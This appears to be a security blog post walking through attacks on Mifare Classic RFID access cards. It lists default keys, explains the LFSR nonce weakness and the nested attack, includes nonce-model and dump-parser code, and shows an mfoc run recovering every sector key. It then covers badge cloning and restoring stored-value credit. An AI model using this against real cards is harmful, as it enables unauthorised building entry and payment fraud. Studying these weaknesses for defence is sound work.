Introduction

Our previous post, Access Control Part 1: Magstripes Revisited, demonstrated the use and subversion of magstripe technology. RFID is the future of access control, but unless it is implemented securely it too can be vulnerable to attack.

Below we will walk through a valid attack methodology, including hardware and software, that can be used to subvert some RFID Access Control Systems.

The organisations that tend to be vulnerable are early adopters of the technology and, in some cases, departments with a fixed, limited security budget.

Mifare Specification

Overview

Mifare Classic is one of the most widely used RFID cards (13.56 MHz). It follows the ISO/IEC 14443 Type A standard for the lower protocol layers and uses the proprietary Crypto1 stream cipher with 48-bit keys for authentication and encryption. These cards are relatively cheap, at approximately £1 (GBP) each.

Technical Details

Below is a simplified depiction of the layout of a Mifare RFID card. Only the first two sectors are shown, as the Sector 1 layout is repeated for every sector down to Sector 15 (Mifare 1K card; a 4K card has 40 sectors, the last eight of which have 16 blocks instead of 4):

Sector / Block  | 16 Byte Data Field                       | Read/Write
----------------+------------------------------------------+---------------------------------------
Sec 0 Block 0   | UID | Manufacturer Data                  | Read Only
Sec 0 Block 1   | Mifare Application Directory             | R/W
Sec 0 Block 2   | Mifare Application Directory             | R/W
Sec 0 Block 3   | Key A | Permissions (access bits) | Key B | Sector trailer (Key A is never readable)
----------------+------------------------------------------+---------------------------------------
Sec 1 Block 0   | Data                                     | R/W
Sec 1 Block 1   | Data                                     | R/W
Sec 1 Block 2   | Data                                     | R/W
Sec 1 Block 3   | Key A | Permissions (access bits) | Key B | Sector trailer (Key A is never readable)
----------------+------------------------------------------+---------------------------------------
...

Security Features

Read-only Unique Identifier (UID)

Mutual authentication between reader and card, followed by encrypted communication

CRYPTO1: a non-public, proprietary cipher; the parity bits of each byte are also sent encrypted ("obfuscated parity information")

default keys

Manufacturers pre-load Mifare cards with default (transport) keys, which can be found in their design/specification documentation. Below is a list of the most common default keys. These are extremely useful to know when trying to crack Mifare RFID cards, and mfoc tries them automatically before doing anything else:

0x000000000000

0xffffffffffff

0xa0a1a2a3a4a5

0xb0b1b2b3b4b5

0x4d3a99c351dd

0x1a982c7e459a

0xd3f7d3f7d3f7

0xaabbccddeeff

Crypto1 Weakness + LFSR

No non-linear feedback in the nonce generator

LFSR

Linear Feedback Shift Registers (LFSRs) have always received considerable attention in cryptography. Owing to their good statistical properties, large period and low implementation cost, they are widely used as building blocks of stream ciphers. On their own, however, they are notoriously insecure: the structure of an n-bit LFSR can be deduced by observing 2n consecutive output bits (the Berlekamp-Massey algorithm does exactly this). Because of this inherent linearity, LFSR-based stream ciphers are susceptible to a number of general attacks, including fast correlation attacks, algebraic attacks, cache timing attacks, known-plaintext attacks, meet-in-the-middle consistency attacks, best affine approximation attacks and derived sequence attacks.

In Mifare Classic the tag's pseudo-random nonce generator is exactly such a register: a 16-bit LFSR with feedback polynomial x^16 + x^14 + x^13 + x^11 + 1, i.e. the feedback function L16(x0 ... x15) = x0 XOR x2 XOR x3 XOR x5.

The nonce Nt is 32 bits long, but it is simply the next 32 output bits of this 16-bit register, so it has only 16 bits of entropy: the first 16 bits are the register state and completely determine the other 16, and only 65535 distinct nonces exist. The authentication answers come from the same sequence, Ar = suc^2(Nt) from the reader and At = suc^3(Nt) from the tag, where suc(Nt) denotes the next 32-bit nonce the register would produce after Nt.

The register is clocked at a fixed rate from the moment the tag is powered up, so the nonce is a function of elapsed time only. Generated nonces can therefore be predicted (or reproduced) by controlling the timing of the authentication.

Recover Keys Using Nested Attack

Authenticate to a block in sector X with a default key (see the list above) and record the tag's nonce Nt. This first nonce is sent in the clear and, as shown above, is determined by the LFSR.

Authenticate to the same block with the same key again. The tag's new nonce Nt' is now sent inside the encrypted session, but since this sector key is known the keystream can be computed and Nt' decrypted.

Compute the timing distance: the number of LFSR shifts between Nt and Nt'. This measures how far the generator advances between two consecutive authentications on this particular card and reader; it is sampled several times because it varies slightly.

Authenticate to a block in a sector whose key is unknown. Its nonce arrives encrypted under the unknown key, but from the distance the plaintext nonce can be guessed (the encrypted parity bits leak enough information to reject wrong guesses). A known plaintext/ciphertext pair gives 32 bits of keystream, from which the structure of Crypto1 lets the sector key be narrowed to a small set of candidates that are then tried against the card. Repeat sector by sector; mfoc automates the whole procedure.
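To make the two sections above concrete, here is a small model of the tag's nonce generator, written for this post as an added example (it is not code from the original post, nor from mfoc or libnfc). It implements the 16-bit LFSR with feedback x0 XOR x2 XOR x3 XOR x5 (the polynomial x^16 + x^14 + x^13 + x^11 + 1), derives a 32-bit nonce Nt from a register state, computes the successor function (so Ar = suc^2(Nt) and At = suc^3(Nt)), shows that a nonce's low 16 bits are fixed by its high 16 bits, checks the register's period of 65535, and computes the distance in shifts between two nonces, which is the quantity mfoc prints as "distance" while probing in the run further down. The bit ordering (first generated bit in the most significant position) and the seed 0x1234 are presentation choices for the demo, not anything the card defines.

```python
# Added example: model of the Mifare Classic tag nonce generator (16-bit LFSR).
# Convention (an assumption for presentation): the oldest state bit x0 sits in
# bit 15 of `state`, so the feedback x0 ^ x2 ^ x3 ^ x5 reads bits 15, 13, 12, 10,
# and every multi-bit value returned below has its first generated bit in the MSB.

MASK16 = 0xFFFF
MASK32 = 0xFFFFFFFF


def lfsr_step(state):
    """Shift the 16-bit register once, feeding back x0 ^ x2 ^ x3 ^ x5."""
    fb = ((state >> 15) ^ (state >> 13) ^ (state >> 12) ^ (state >> 10)) & 1
    return ((state << 1) & MASK16) | fb


def lfsr_output(state, n):
    """Clock the register n times; return (the n output bits as an int, the final state)."""
    out = 0
    for _ in range(n):
        out = (out << 1) | ((state >> 15) & 1)
        state = lfsr_step(state)
    return out, state


def tag_nonce(state):
    """Nt: the next 32 output bits of the register."""
    return lfsr_output(state, 32)[0]


def is_valid_nonce(nt):
    """Only 65535 of the 2^32 possible values can ever be emitted: the high 16 bits
    are the register state and therefore fix the low 16 bits (16 bits of entropy)."""
    return tag_nonce(nt >> 16) == nt


def suc(nt):
    """Successor of a nonce: the 32 bits the register emits right after nt.
    In the authentication the reader answers Ar = suc^2(Nt), the tag At = suc^3(Nt)."""
    _, state = lfsr_output(nt & MASK16, 16)  # low half of nt is x16..x31; advance to x32..x47
    return lfsr_output(state, 32)[0]


def suc_n(nt, k):
    """suc applied k times (suc^k)."""
    for _ in range(k):
        nt = suc(nt)
    return nt


def lfsr_period(seed):
    """Number of shifts until the state recurs: 65535 for any non-zero seed."""
    state, steps = lfsr_step(seed), 1
    while state != seed:
        state, steps = lfsr_step(state), steps + 1
    return steps


def nonce_distance(nt_from, nt_to):
    """Register shifts from one nonce to the next (mfoc's 'distance'). Since the
    register runs at a fixed rate from power-up, this is a measure of elapsed time.
    Returns None if nt_to does not lie on nt_from's cycle."""
    state, target = nt_from >> 16, nt_to >> 16
    for d in range(MASK16 + 1):
        if state == target:
            return d
        state = lfsr_step(state)
    return None


if __name__ == "__main__":
    nt = tag_nonce(0x1234)  # arbitrary seed for the demo
    print(f"Nt       = {nt:08x}  valid={is_valid_nonce(nt)}")
    print(f"Ar=suc^2 = {suc_n(nt, 2):08x}")
    print(f"At=suc^3 = {suc_n(nt, 3):08x}")
    print(f"period   = {lfsr_period(0x1234)}")
    print(f"distance Nt -> suc(Nt) = {nonce_distance(nt, suc(nt))}")
```

Flipping any of the low 16 bits of a genuine nonce produces a value the card can never send, which is why a reader that observes one nonce already knows the whole register state, and why guessing Nt in the nested attack is a search over at most 65535 values rather than 2^32.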

Tools

Hardware

Tikitag – $40(USD) – http://www.acs.com.hk/index.php?pid=product&id=ACR122U

Proxmark 3 – $400(USD) – http://proxmark3.com

Software

Android NFC Apps (Selection)

MFOC Example

Below is an example test run of mfoc. Note how a single sector on a default key leads to the entire card being compromised.

$ mfoc -O out.mfd
Found MIFARE Classic 4K card with uid: 3b0e943f
[Key: ffffffffffff] -> [........................................]
[Key: a0a1a2a3a4a5] -> [x..x....................................]
[Key: b0b1b2b3b4b5] -> [x..x....................................]
[Key: 000000000000] -> [x..x....................................]
[Key: 4d3a99c351dd] -> [x..x....................................]
[Key: 1a982c7e459a] -> [x..x....................................]
[Key: aabbccddeeff] -> [x..x....................................]
Sector 00 - FOUND_KEY [A]
Sector 00 - UNKNOWN_KEY [B]
Sector 01 - UNKNOWN_KEY [A]
Sector 01 - UNKNOWN_KEY [B]
Sector 02 - UNKNOWN_KEY [A]
Sector 02 - UNKNOWN_KEY [B]
Sector 03 - FOUND_KEY [A]
Sector 03 - UNKNOWN_KEY [B]
Sector 04 - UNKNOWN_KEY [A]
Sector 04 - UNKNOWN_KEY [B]
Sector 05 - UNKNOWN_KEY [A]
Sector 05 - UNKNOWN_KEY [B]
Sector 06 - UNKNOWN_KEY [A]
Sector 06 - UNKNOWN_KEY [B]
...
Using sector 00 as an exploit sector
Sector: 1, type A, probe 0, distance 32797 .....
Sector: 1, type A, probe 1, distance 30241 .....
Sector: 1, type A, probe 2, distance 29435 .....
Found Key: A [1494e81663d7]
Sector: 16, type A, probe 21, distance 32837 .....
Sector: 16, type A, probe 22, distance 29443 .....
Sector: 16, type A, probe 23, distance 29433 .....
Sector: 16, type A, probe 24, distance 32843 .....
Found Key: A [6d59ee19b1c9]
Sector: 17, type A
Sector: 4, type B, probe 0, distance 32799 .....
Sector: 4, type B, probe 1, distance 32797 .....
Sector: 4, type B, probe 2, distance 32803 .....
Sector: 4, type B, probe 3, distance 29427 .....
Found Key: B [a24c49684d8e]
Sector: 5, type B
Sector: 36, type B, probe 0, distance 32797 .....
Sector: 36, type B, probe 1, distance 32845 .....
Sector: 36, type B, probe 2, distance 31087 .....
Sector: 36, type B, probe 3, distance 32797 .....
Sector: 36, type B, probe 4, distance 29431 .....
Sector: 36, type B, probe 5, distance 29441 .....
Found Key: B [107913b22a00]
Sector: 37, type B, probe 0, distance 31137 .....
Sector: 37, type B, probe 1, distance 29437 .....
Sector: 37, type B, probe 2, distance 29431 .....
Sector: 37, type B, probe 3, distance 29441 .....
Found Key: B [6d4490b424d8]
Sector: 38, type B
Found Key: B [6d59ee19b1c9]
Sector: 39, type B
Found Key: B [6d59ee19b1c9]
Auth with all sectors succeeded, dumping keys to a file!
Block 255, type A, key 6d59ee19b1c9 :00 00 00 00 00 00 0f 00 ff 00 00 00 00 00 00 00
Block 254, type B, key 6d59ee19b1c9 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 253, type B, key 6d59ee19b1c9 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 252, type B, key 6d59ee19b1c9 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 251, type B, key 6d59ee19b1c9 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 250, type B, key 6d59ee19b1c9 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
...

And the entire card is accessible. The nested attack needs one known sector key as a foothold, here supplied by a default key; on a card with no default keys a first key has to be recovered by other means (for example the "darkside" attack implemented by mfcuk), and cards whose nonce generator has been fixed do not yield to this approach at all.
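As an added example (not code from the original post, and not part of mfoc), here is a parser for the dump that mfoc -O writes. An .mfd file is nothing more than the card's 16-byte blocks back to back: 1024 bytes for a 1K card, 4096 for a 4K card, where sectors 32 to 39 have 16 blocks each. The code walks every sector trailer, splits out Key A, the access bits and Key B, checks that the inverted copies of the access bits agree (a trailer that fails this check permanently locks the sector if it is ever written back), validates the BCC check byte of the UID, and lists the sectors that are not on a default key. The dump it runs on is constructed inline for the demo: the UID and two of the keys are values taken from the mfoc run above, while the "BADGE-0042" record and its placement in sector 14 are made up. One thing to keep in mind with real dumps: Key A can never be read from the card, so a raw read returns zeros in that field (as block 255 above shows); keys are only present in the file if the dumping tool writes in the ones it recovered, which is what the sample assumes.

```python
# Added example: parse a raw Mifare Classic dump (.mfd) and audit its sector trailers.
BLOCK = 16

# Default/transport keys listed earlier in the post (the same ones mfoc tries first).
DEFAULT_KEYS = {bytes.fromhex(k) for k in (
    "000000000000", "ffffffffffff", "a0a1a2a3a4a5", "b0b1b2b3b4b5",
    "4d3a99c351dd", "1a982c7e459a", "d3f7d3f7d3f7", "aabbccddeeff")}


def sector_count(dump):
    if len(dump) == 1024:
        return 16           # 1K: 16 sectors x 4 blocks
    if len(dump) == 4096:
        return 40           # 4K: sectors 0-31 have 4 blocks, 32-39 have 16
    raise ValueError("dump must be 1024 or 4096 bytes")


def sector_blocks(sector):
    """(first block number, number of blocks) of a sector; the trailer is the last block."""
    if sector < 32:
        return sector * 4, 4
    return 128 + (sector - 32) * 16, 16


def decode_access_bits(b6, b7, b8):
    """Unpack the three access bytes into (C1, C2, C3) for the four block groups
    (index 3 is the trailer itself). Each nibble is stored plain and inverted;
    'consistent' is False when the copies disagree (writing that locks the sector)."""
    c1 = (b7 >> 4) & 0xF
    c2 = b8 & 0xF
    c3 = (b8 >> 4) & 0xF
    consistent = (b6 == (((~c2 & 0xF) << 4) | (~c1 & 0xF))) and ((b7 & 0xF) == (~c3 & 0xF))
    conds = [((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)]
    return conds, consistent


def uid(dump):
    """4-byte UID from the manufacturer block and whether its BCC (XOR of the UID
    bytes) checks out; a wrong BCC is typical of a carelessly written 'magic' clone."""
    u = dump[0:4]
    return u, dump[4] == (u[0] ^ u[1] ^ u[2] ^ u[3])


def parse_dump(dump):
    sectors = []
    for s in range(sector_count(dump)):
        first, count = sector_blocks(s)
        trailer = dump[(first + count - 1) * BLOCK:(first + count) * BLOCK]
        key_a, key_b = trailer[0:6], trailer[10:16]
        conds, ok = decode_access_bits(trailer[6], trailer[7], trailer[8])
        sectors.append({
            "sector": s, "key_a": key_a.hex(), "key_b": key_b.hex(),
            "default_a": key_a in DEFAULT_KEYS, "default_b": key_b in DEFAULT_KEYS,
            "access": conds, "access_ok": ok,
            "data": [dump[b * BLOCK:(b + 1) * BLOCK] for b in range(first, first + count - 1)],
        })
    return sectors


def sectors_with_custom_keys(sectors):
    """Sectors with at least one non-default key: where the application data lives."""
    return [s["sector"] for s in sectors if not (s["default_a"] and s["default_b"])]


def build_sample_1k():
    """Constructed 1K dump: transport keys everywhere except sector 14, which holds a
    made-up badge record behind two of the keys mfoc recovered in the run above."""
    dump = bytearray(1024)
    dump[0:4] = bytes.fromhex("3b0e943f")                   # UID from the mfoc run
    dump[4] = dump[0] ^ dump[1] ^ dump[2] ^ dump[3]          # BCC
    dump[5] = 0x08                                          # SAK of a Mifare Classic 1K
    for s in range(16):
        first, count = sector_blocks(s)
        t = (first + count - 1) * BLOCK
        dump[t:t + 6] = bytes.fromhex("ffffffffffff")        # transport key A
        dump[t + 6:t + 10] = bytes.fromhex("ff078069")       # transport access bits + user byte
        dump[t + 10:t + 16] = bytes.fromhex("ffffffffffff")  # transport key B
    first, _ = sector_blocks(14)
    t = (first + 3) * BLOCK
    dump[t:t + 6] = bytes.fromhex("1494e81663d7")            # key A found for sector 1 above, reused
    dump[t + 10:t + 16] = bytes.fromhex("a24c49684d8e")      # key B found for sector 4 above, reused
    dump[first * BLOCK:first * BLOCK + BLOCK] = b"BADGE-0042".ljust(BLOCK, b"\x00")  # made up
    return bytes(dump)


if __name__ == "__main__":
    dump = build_sample_1k()
    u, bcc_ok = uid(dump)
    print(f"UID {u.hex()} (BCC ok: {bcc_ok})")
    secs = parse_dump(dump)
    for sec in secs:
        flag = "" if sec["access_ok"] else "  <-- corrupt access bits"
        print(f"sector {sec['sector']:2d}  A={sec['key_a']} default={sec['default_a']}  "
              f"B={sec['key_b']} default={sec['default_b']}  trailer C1C2C3={sec['access'][3]}{flag}")
    print("sectors with custom keys:", sectors_with_custom_keys(secs))
```

The same parser reads a 4K dump unchanged; sector_blocks takes care of the 16-block sectors at the top of the card, which is where the Block 250-255 lines in the mfoc output come from (sector 39). Run it over a real dump before editing and writing anything back, and never write a trailer whose access bits fail the consistency check.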

Other Findings/Observations

Many access control systems appear to store their data in Sector 14. This sector can be copied (cloned) to other Mifare cards, or even manipulated to gain access to buildings, rooms or systems that were otherwise inaccessible.

Considerations

Risks

Cloning

Once all keys are recovered, the entire card can be cloned onto a blank Mifare Classic.

"Chinese magic" Mifare cards additionally allow the UID (normally a read-only field) to be written, so the clone carries the original UID as well.

T5557 cards are 125 kHz low-frequency tags: they can clone the hard-coded UID of an LF proximity card, but not the UID of a 13.56 MHz Mifare card.

Proxmark 3 can replay a dumped card in emulation mode without any blank card at all.

Fraud

Restore previous credit: a stored-value card can be dumped before spending and written back afterwards.



Cost of Attack

$40(USD) – tikitag / touchatag RFID reader/writer (sufficient for reading / cracking / writing / cloning Mifare Classic cards)

$400(USD) – Proxmark 3 (just for advanced RFID cracking)

£1 for a blank 4K Mifare Classic card (can be bought on ebay.com from Taiwan/China)

At a minimum of $41 (USD) / £30 (GBP) I could potentially walk straight through your organisation's front door!
